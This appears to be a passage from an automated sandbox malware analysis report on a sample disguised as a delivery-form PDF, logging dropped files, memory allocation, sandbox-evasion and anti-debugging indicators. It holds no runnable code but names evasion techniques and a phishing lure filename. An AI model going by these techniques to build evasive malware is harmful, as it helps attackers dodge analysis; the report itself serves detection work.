                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Allocates many large memory junks
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFMemory allocated: 2880000 memory commit 500006912Jump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFMemory allocated: 2881000 memory commit 500178944Jump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFMemory allocated: 28AC000 memory commit 500002816Jump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFMemory allocated: 28AD000 memory commit 500199424Jump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFMemory allocated: 28DE000 memory commit 501014528Jump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFMemory allocated: 29D6000 memory commit 500006912Jump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFMemory allocated: 29D8000 memory commit 500015104Jump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeMemory allocated: 2930000 memory commit 500006912Jump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeMemory allocated: 2931000 memory commit 500178944Jump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeMemory allocated: 295C000 memory commit 500002816Jump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeMemory allocated: 295D000 memory commit 500199424Jump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeMemory allocated: 298E000 memory commit 501014528Jump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeMemory allocated: 2A86000 memory commit 500006912Jump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeMemory allocated: 2A88000 memory commit 500015104Jump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFMemory allocated: 2870000 memory commit 500006912Jump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFMemory allocated: 2871000 memory commit 500178944Jump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFMemory allocated: 289C000 memory commit 500002816Jump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFMemory allocated: 289D000 memory commit 500199424Jump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFMemory allocated: 28CE000 memory commit 501014528Jump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFMemory allocated: 29C6000 memory commit 500006912Jump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFMemory allocated: 29C8000 memory commit 500015104Jump to behavior
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Windows\SysWOW64\proquota.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                      Source: C:\Windows\SysWOW64\proquota.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                      Source: C:\Windows\SysWOW64\proquota.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A08096E rdtsc 3_2_2A08096E
                      Source: C:\Users\Public\Libraries\dxobknwL.pifAPI coverage: 0.8 %
                      Source: C:\Users\Public\Libraries\dxobknwL.pifAPI coverage: 0.3 %
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe TID: 5252Thread sleep time: -50000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_029358B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_029358B4
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1774111386.000000000069E000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1774111386.00000000006E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Lwnkboxd.PIF, 00000005.00000002.1883846137.000000000059E000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000002.2023111489.00000000008D1000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2455010423.0000000000779000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: IzFuULsBXSkS.exe, 00000013.00000002.2916108350.0000000000AAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllww
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeAPI call chain: ExitProcess graph end nodegraph_0-29044
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFAPI call chain: ExitProcess graph end nodegraph_5-26832
                      Source: C:\Users\Public\Libraries\dxobknwL.pifProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_0294EBF0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_0294EBF0
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\dxobknwL.pifProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\dxobknwL.pifProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\dxobknwL.pifProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A08096E rdtsc 3_2_2A08096E
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_00417B33 LdrLoadDll,3_2_00417B33
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_029487A0 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_029487A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0CCA11 mov eax, dword ptr fs:[00000030h]3_2_2A0CCA11
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07CA24 mov eax, dword ptr fs:[00000030h]3_2_2A07CA24
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06EA2E mov eax, dword ptr fs:[00000030h]3_2_2A06EA2E
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A064A35 mov eax, dword ptr fs:[00000030h]3_2_2A064A35
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A064A35 mov eax, dword ptr fs:[00000030h]3_2_2A064A35
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A046A50 mov eax, dword ptr fs:[00000030h]3_2_2A046A50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A046A50 mov eax, dword ptr fs:[00000030h]3_2_2A046A50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A046A50 mov eax, dword ptr fs:[00000030h]3_2_2A046A50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A046A50 mov eax, dword ptr fs:[00000030h]3_2_2A046A50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A046A50 mov eax, dword ptr fs:[00000030h]3_2_2A046A50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A046A50 mov eax, dword ptr fs:[00000030h]3_2_2A046A50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A046A50 mov eax, dword ptr fs:[00000030h]3_2_2A046A50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A050A5B mov eax, dword ptr fs:[00000030h]3_2_2A050A5B
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A050A5B mov eax, dword ptr fs:[00000030h]3_2_2A050A5B
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07CA6F mov eax, dword ptr fs:[00000030h]3_2_2A07CA6F
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07CA6F mov eax, dword ptr fs:[00000030h]3_2_2A07CA6F
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07CA6F mov eax, dword ptr fs:[00000030h]3_2_2A07CA6F
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0EEA60 mov eax, dword ptr fs:[00000030h]3_2_2A0EEA60
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0BCA72 mov eax, dword ptr fs:[00000030h]3_2_2A0BCA72
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0BCA72 mov eax, dword ptr fs:[00000030h]3_2_2A0BCA72
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04EA80 mov eax, dword ptr fs:[00000030h]3_2_2A04EA80
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04EA80 mov eax, dword ptr fs:[00000030h]3_2_2A04EA80
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04EA80 mov eax, dword ptr fs:[00000030h]3_2_2A04EA80
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04EA80 mov eax, dword ptr fs:[00000030h]3_2_2A04EA80
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04EA80 mov eax, dword ptr fs:[00000030h]3_2_2A04EA80
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04EA80 mov eax, dword ptr fs:[00000030h]3_2_2A04EA80
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04EA80 mov eax, dword ptr fs:[00000030h]3_2_2A04EA80
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04EA80 mov eax, dword ptr fs:[00000030h]3_2_2A04EA80
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04EA80 mov eax, dword ptr fs:[00000030h]3_2_2A04EA80
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A114A80 mov eax, dword ptr fs:[00000030h]3_2_2A114A80
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A078A90 mov edx, dword ptr fs:[00000030h]3_2_2A078A90
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A048AA0 mov eax, dword ptr fs:[00000030h]3_2_2A048AA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A048AA0 mov eax, dword ptr fs:[00000030h]3_2_2A048AA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A096AA4 mov eax, dword ptr fs:[00000030h]3_2_2A096AA4
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A096ACC mov eax, dword ptr fs:[00000030h]3_2_2A096ACC
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A096ACC mov eax, dword ptr fs:[00000030h]3_2_2A096ACC
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A096ACC mov eax, dword ptr fs:[00000030h]3_2_2A096ACC
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A040AD0 mov eax, dword ptr fs:[00000030h]3_2_2A040AD0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A074AD0 mov eax, dword ptr fs:[00000030h]3_2_2A074AD0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A074AD0 mov eax, dword ptr fs:[00000030h]3_2_2A074AD0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07AAEE mov eax, dword ptr fs:[00000030h]3_2_2A07AAEE
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07AAEE mov eax, dword ptr fs:[00000030h]3_2_2A07AAEE
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A114B00 mov eax, dword ptr fs:[00000030h]3_2_2A114B00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0BEB1D mov eax, dword ptr fs:[00000030h]3_2_2A0BEB1D
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0BEB1D mov eax, dword ptr fs:[00000030h]3_2_2A0BEB1D
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0BEB1D mov eax, dword ptr fs:[00000030h]3_2_2A0BEB1D
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0BEB1D mov eax, dword ptr fs:[00000030h]3_2_2A0BEB1D
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0BEB1D mov eax, dword ptr fs:[00000030h]3_2_2A0BEB1D
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0BEB1D mov eax, dword ptr fs:[00000030h]3_2_2A0BEB1D
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0BEB1D mov eax, dword ptr fs:[00000030h]3_2_2A0BEB1D
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0BEB1D mov eax, dword ptr fs:[00000030h]3_2_2A0BEB1D
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0BEB1D mov eax, dword ptr fs:[00000030h]3_2_2A0BEB1D
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06EB20 mov eax, dword ptr fs:[00000030h]3_2_2A06EB20
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06EB20 mov eax, dword ptr fs:[00000030h]3_2_2A06EB20
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A108B28 mov eax, dword ptr fs:[00000030h]3_2_2A108B28
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A108B28 mov eax, dword ptr fs:[00000030h]3_2_2A108B28
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F4B4B mov eax, dword ptr fs:[00000030h]3_2_2A0F4B4B
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F4B4B mov eax, dword ptr fs:[00000030h]3_2_2A0F4B4B
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A112B57 mov eax, dword ptr fs:[00000030h]3_2_2A112B57
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A112B57 mov eax, dword ptr fs:[00000030h]3_2_2A112B57
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A112B57 mov eax, dword ptr fs:[00000030h]3_2_2A112B57
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A112B57 mov eax, dword ptr fs:[00000030h]3_2_2A112B57
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E8B42 mov eax, dword ptr fs:[00000030h]3_2_2A0E8B42
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0D6B40 mov eax, dword ptr fs:[00000030h]3_2_2A0D6B40
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0D6B40 mov eax, dword ptr fs:[00000030h]3_2_2A0D6B40
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A10AB40 mov eax, dword ptr fs:[00000030h]3_2_2A10AB40
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A038B50 mov eax, dword ptr fs:[00000030h]3_2_2A038B50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0EEB50 mov eax, dword ptr fs:[00000030h]3_2_2A0EEB50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03CB7E mov eax, dword ptr fs:[00000030h]3_2_2A03CB7E
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A050BBE mov eax, dword ptr fs:[00000030h]3_2_2A050BBE
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A050BBE mov eax, dword ptr fs:[00000030h]3_2_2A050BBE
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F4BB0 mov eax, dword ptr fs:[00000030h]3_2_2A0F4BB0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F4BB0 mov eax, dword ptr fs:[00000030h]3_2_2A0F4BB0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A040BCD mov eax, dword ptr fs:[00000030h]3_2_2A040BCD
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A040BCD mov eax, dword ptr fs:[00000030h]3_2_2A040BCD
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A040BCD mov eax, dword ptr fs:[00000030h]3_2_2A040BCD
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A060BCB mov eax, dword ptr fs:[00000030h]3_2_2A060BCB
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A060BCB mov eax, dword ptr fs:[00000030h]3_2_2A060BCB
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A060BCB mov eax, dword ptr fs:[00000030h]3_2_2A060BCB
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0EEBD0 mov eax, dword ptr fs:[00000030h]3_2_2A0EEBD0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A048BF0 mov eax, dword ptr fs:[00000030h]3_2_2A048BF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A048BF0 mov eax, dword ptr fs:[00000030h]3_2_2A048BF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A048BF0 mov eax, dword ptr fs:[00000030h]3_2_2A048BF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06EBFC mov eax, dword ptr fs:[00000030h]3_2_2A06EBFC
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0CCBF0 mov eax, dword ptr fs:[00000030h]3_2_2A0CCBF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0CC810 mov eax, dword ptr fs:[00000030h]3_2_2A0CC810
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A062835 mov eax, dword ptr fs:[00000030h]3_2_2A062835
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A062835 mov eax, dword ptr fs:[00000030h]3_2_2A062835
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A062835 mov eax, dword ptr fs:[00000030h]3_2_2A062835
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A062835 mov ecx, dword ptr fs:[00000030h]3_2_2A062835
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A062835 mov eax, dword ptr fs:[00000030h]3_2_2A062835
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A062835 mov eax, dword ptr fs:[00000030h]3_2_2A062835
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E483A mov eax, dword ptr fs:[00000030h]3_2_2A0E483A
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E483A mov eax, dword ptr fs:[00000030h]3_2_2A0E483A
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07A830 mov eax, dword ptr fs:[00000030h]3_2_2A07A830
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A052840 mov ecx, dword ptr fs:[00000030h]3_2_2A052840
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A070854 mov eax, dword ptr fs:[00000030h]3_2_2A070854
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A044859 mov eax, dword ptr fs:[00000030h]3_2_2A044859
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A044859 mov eax, dword ptr fs:[00000030h]3_2_2A044859
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0D6870 mov eax, dword ptr fs:[00000030h]3_2_2A0D6870
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0D6870 mov eax, dword ptr fs:[00000030h]3_2_2A0D6870
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0CE872 mov eax, dword ptr fs:[00000030h]3_2_2A0CE872
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0CE872 mov eax, dword ptr fs:[00000030h]3_2_2A0CE872
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A040887 mov eax, dword ptr fs:[00000030h]3_2_2A040887
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0CC89D mov eax, dword ptr fs:[00000030h]3_2_2A0CC89D
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06E8C0 mov eax, dword ptr fs:[00000030h]3_2_2A06E8C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A1108C0 mov eax, dword ptr fs:[00000030h]3_2_2A1108C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A10A8E4 mov eax, dword ptr fs:[00000030h]3_2_2A10A8E4
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07C8F9 mov eax, dword ptr fs:[00000030h]3_2_2A07C8F9
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07C8F9 mov eax, dword ptr fs:[00000030h]3_2_2A07C8F9
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0BE908 mov eax, dword ptr fs:[00000030h]3_2_2A0BE908
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0BE908 mov eax, dword ptr fs:[00000030h]3_2_2A0BE908
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A038918 mov eax, dword ptr fs:[00000030h]3_2_2A038918
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A038918 mov eax, dword ptr fs:[00000030h]3_2_2A038918
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0CC912 mov eax, dword ptr fs:[00000030h]3_2_2A0CC912
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C892A mov eax, dword ptr fs:[00000030h]3_2_2A0C892A
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0D892B mov eax, dword ptr fs:[00000030h]3_2_2A0D892B
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C0946 mov eax, dword ptr fs:[00000030h]3_2_2A0C0946
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A114940 mov eax, dword ptr fs:[00000030h]3_2_2A114940
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A066962 mov eax, dword ptr fs:[00000030h]3_2_2A066962
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A066962 mov eax, dword ptr fs:[00000030h]3_2_2A066962
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A066962 mov eax, dword ptr fs:[00000030h]3_2_2A066962
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A08096E mov eax, dword ptr fs:[00000030h]3_2_2A08096E
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A08096E mov edx, dword ptr fs:[00000030h]3_2_2A08096E
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A08096E mov eax, dword ptr fs:[00000030h]3_2_2A08096E
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0CC97C mov eax, dword ptr fs:[00000030h]3_2_2A0CC97C
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E4978 mov eax, dword ptr fs:[00000030h]3_2_2A0E4978
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E4978 mov eax, dword ptr fs:[00000030h]3_2_2A0E4978
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0529A0 mov eax, dword ptr fs:[00000030h]3_2_2A0529A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0529A0 mov eax, dword ptr fs:[00000030h]3_2_2A0529A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0529A0 mov eax, dword ptr fs:[00000030h]3_2_2A0529A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0529A0 mov eax, dword ptr fs:[00000030h]3_2_2A0529A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0529A0 mov eax, dword ptr fs:[00000030h]3_2_2A0529A0
